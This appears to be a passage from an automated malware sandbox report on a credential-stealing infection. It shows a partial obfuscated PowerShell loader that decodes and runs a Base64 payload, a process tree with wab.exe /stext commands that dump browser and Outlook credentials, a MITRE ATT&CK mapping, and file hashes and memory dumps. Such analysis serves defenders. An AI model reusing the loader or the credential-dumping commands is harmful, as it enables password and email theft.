$Fnernes;bagstagets (semisavage ' BSRut ,aBrrButWy- aSPelUle,reFlpS. Se4s. ');bagstagets (semisavage ' R$Trg BlUdoAbbIna PlHi:UnS,pe Fl,evTrm.co dUbs eiSig De gl Ms.fe PsBe=Po( NTAleDes at.a- oPNoaBet ThO Da$ChL .aInr,am.osP )Du ') ;bagstagets (semisavage 'Op$DigL,lovoSkbPha Al s: oD,ueT s.picolBevv,e.rrNo=Ro$ShgS,lDeo .bFlaHilF.:P SMetAfeAsr FiBrlodiEuzE,aSabStiPrl ,i ,tReisneTasLe+Un+St%Fo$PeB.guB.sS,bWeo.uyR,.Rec,ooUnuRun ,tSh ') ;$Ischiovertebral=$Busboy[$Desilver];}$Fogedforbud=347549;$Keckling=28042;bagstagets (semisavage 'T,$T gLilB.o Kb Ba UlKo:.dGA r naSlpS,h oCosr c DoEjp ee.e ,o=Op SGcoeKntSa-.hC loOmn bt Ae Mn Nt . r$MoLF,aSkrMemYmsU, ');bagstagets (semisavage 'Gr$H gAflL.onibBeaCylKu:SegMekHos K Ut= . e[TaS ay.os atOveRkmSy.VaC,uoLbnByvReeC,rR,tJ,]A : E: MFspr loTamH BCia Hs reNi6 4 S otHerPoi unVrg a(S.$UdGSurC.aFapTrhMaoB sb cDioSkpT e D)S, ');bagstagets (semisavage 'Fl$Dig ulOro.obR.aMelFi:ooP naTelTolHyipraS.tChiS vSkeNal,tyD Fl=M, M,[TrS nySfsIntR,eMemV .RbT,aeAnxFrtBo.,nE DnAscMoo NdIdiP.n .gAn] i: U: .A,eS uCmaIUnI b.TiGZ e ht RSS.t Cr PiO,nFagSc( P$ArgRekResAn)Sm ');bagstagets (semisavage 'Am$.kg olL o ObVeaTelPh:t.K Lni,i HfShe SlCriPikHyeHa=af$PrPTaaTilTilLoiS aAlthaiOsv ae SlN.yPe.UnsD u bK.s.nt .rMiiNonHogS,(.o$ AFTro ,g eUrdsafE.oZurM.b Su dEx,Di$CoK teCacS.kUblAmi in PgFo) O ');bagstagets $Knifelike;"
        6⤵
        Blocklisted process makes network request
        Access Token Manipulation: Create Process with Token
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1716
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Posho.Sgs && echo t"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2156
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\armnpma"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2156
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\dtrgietolp"
        5⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:3328
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nneyjxeizxzbu"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ac3bf9756600f6c31a15240716e6e7c6

SHA1
521aa76b55f74cafd1b579933dc0fae439acb0f5

SHA256
f7bc65b2962543bb5165f2b1bb6b3390ed3b55801475b2fd7701129cc8a081fd

SHA512
96ae0dddaeadae05fed313707076af5d443d328d2ea8524aa283812591b615b596a0aab1d2918471aba59f5546cebca7521bd2003db63a24f548899bee5fa67a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Trekanterne174.vbs

Filesize
23KB

MD5
1603bcb30077161d37f2977db50f5873

SHA1
43df53981fc58d99cea68279555b4dd98366ed87

SHA256
c658636d66ecbaf505b36ded0d6798240fc60b955a47b58473c9f28b4927b22a

SHA512
29d8ecd9fc3b7ddfa1d6d3296cc4cc3bdbcb970f68f0aa3ae8c439e23faa9ad92170cdd82af958d01335b2fb9a76ebe5e5a9e5a84c89fca0f5924c938b5fe263

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3ybqcpw4.3ec.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\armnpma

Filesize
4KB

MD5
2538ec9e8425a905937573069b77d4c2

SHA1
ad0c2b7aff4382e23444d26adac96d9697b849f3

SHA256
29338949fae4c88a972837aae898529e4c7a2c4df35982eef2f8d7b602c17f4e

SHA512
a867a471b837b9c662528ee7a5904e8fe7b1eebb277b8a7fe4d4caf423fae914baf692bb5004c02ddb539b157d63326178467e28b03aa92a533cda19155d501c

Download Submit
memory/824-35-0x0000000000950000-0x0000000001BA4000-memory.dmp

Filesize
18.3MB

Download
memory/824-68-0x0000000022860000-0x0000000022879000-memory.dmp

Filesize
100KB

Download
memory/824-67-0x0000000022860000-0x0000000022879000-memory.dmp

Filesize
100KB

Download
memory/824-64-0x0000000022860000-0x0000000022879000-memory.dmp

Filesize
100KB

Download
memory/824-38-0x0000000001BB0000-0x0000000006B75000-memory.dmp

Filesize
79.8MB

Download
memory/1004-19-0x00007FF9C3240000-0x00007FF9C3D01000-memory.dmp

Filesize
10.8MB

Download
memory/1004-26-0x00007FF9C3240000-0x00007FF9C3D01000-memory.dmp

Filesize
10.8MB

Download
memory/1004-25-0x00007FF9C3240000-0x00007FF9C3D01000-memory.dmp

Filesize
10.8MB

Download
memory/1004-42-0x00007FF9C3240000-0x00007FF9C3D01000-memory.dmp

Filesize
10.8MB

Download
memory/1004-22-0x00007FF9C3240000-0x00007FF9C3D01000-memory.dmp

Filesize
10.8MB

Download
memory/1004-21-0x00007FF9C3240000-0x00007FF9C3D01000-memory.dmp

Filesize
10.8MB

Download
memory/1004-20-0x00007FF9C3243000-0x00007FF9C3245000-memory.dmp

Filesize
8KB

Download
memory/1004-4-0x00007FF9C3243000-0x00007FF9C3245000-memory.dmp

Filesize
8KB

Download
memory/1004-16-0x00007FF9C3240000-0x00007FF9C3D01000-memory.dmp

Filesize
10.8MB

Download
memory/1004-15-0x00007FF9C3240000-0x00007FF9C3D01000-memory.dmp

Filesize
10.8MB

Download
memory/1004-10-0x000001D3342A0000-0x000001D3342C2000-memory.dmp

Filesize
136KB

Download
memory/1716-75-0x0000000005CF0000-0x0000000005D56000-memory.dmp

Filesize
408KB

Download
memory/1716-89-0x0000000006480000-0x00000000064CC000-memory.dmp

Filesize
304KB

Download
memory/1716-94-0x00000000083A0000-0x0000000008944000-memory.dmp

Filesize
5.6MB

Download
memory/1716-93-0x0000000007600000-0x0000000007622000-memory.dmp

Filesize
136KB

Download
memory/1716-92-0x00000000076A0000-0x0000000007736000-memory.dmp

Filesize
600KB

Download
memory/1716-91-0x00000000068D0000-0x00000000068EA000-memory.dmp

Filesize
104KB

Download
memory/1716-90-0x0000000007D20000-0x000000000839A000-memory.dmp

Filesize
6.5MB

Download
memory/1716-88-0x00000000063F0000-0x000000000640E000-memory.dmp

Filesize
120KB

Download
memory/1716-72-0x0000000002AD0000-0x0000000002B06000-memory.dmp

Filesize
216KB

Download
memory/1716-73-0x00000000055D0000-0x0000000005BF8000-memory.dmp

Filesize
6.2MB

Download
memory/1716-76-0x0000000005D60000-0x0000000005DC6000-memory.dmp

Filesize
408KB

Download
memory/1716-86-0x0000000005DD0000-0x0000000006124000-memory.dmp

Filesize
3.3MB

Download
memory/1716-74-0x0000000005550000-0x0000000005572000-memory.dmp

Filesize
136KB

Download
memory/2156-48-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2156-50-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2156-53-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3328-49-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3328-54-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3328-52-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/5032-51-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/5032-57-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/5032-55-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download